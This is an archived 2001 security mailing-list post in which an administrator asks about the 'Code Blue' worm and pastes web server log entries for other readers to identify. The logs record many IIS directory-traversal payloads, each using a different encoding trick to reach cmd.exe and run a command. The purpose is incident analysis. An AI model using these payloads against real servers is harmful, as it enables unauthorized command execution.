Hi all, Why have I not seen anything on this list about the "Code Blue" worm? I have received some alerts and news stories about a "Code Blue" worm: http://www.infoworld.com/articles/hn/xml/01/09/07/010907hncodeblue.xml?0907alert http://news.cnet.com/news/0-1003-200-7086783.html?tag=lh A Chinese antivirus software company even has a cleanup tool for it at: http://www.iduba.net/download/other/tool_010907_CodeBlue.htm And other antivirus software companies now have virus definitions, explanations of the worm, and cleanup instructions: http://www.sarc.com/avcenter/venc/data/w32.bluecode.worm.html http://vil.mcafee.com/dispVirus.asp?virus_k=99202& http://www.f-secure.com/v-descs/codeblue.shtml Last, but not least, the FBI's Infragard program issued an advisory about it on September 10, 2001. What is curious is the lack of discussion about it in a forum where I would expect to see it discussed. Does anyone have a signature for IDS, what it looks like in a web server access log, or packet captures of its file transfer activity? I submit the following web server access log as a possible candidate based on its source in Asia, that it is a new pattern we have seen recently, and it matches with the reported infection method: a.b.c.d - - [10/Sep/2001:20:45:12 -0700] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:45:18 -0700] "GET /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 305 "-" "-" a.b.c.d - - [10/Sep/2001:20:45:20 -0700] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:45:24 -0700] "GET /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:45:38 -0700] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 a.b.c.d - - [10/Sep/2001:20:46:02 -0700] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 a.b.c.d - - [10/Sep/2001:20:46:04 -0700] "GET /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:07 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:09 -0700] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:12 -0700] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:14 -0700] "GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:18 -0700] "GET /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:20 -0700] "GET /cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:22 -0700] "GET /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:24 -0700] "GET /scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:26 -0700] "GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" a.b.c.d - - [10/Sep/2001:20:46:29 -0700] "GET /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-" Does anyone know whether this is indicative of a Code Blue infected machine - or some other automated tool? Michael Katz mikeat_private Responsible Solutions, Ltd. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 11 2001 - 21:17:31 PDT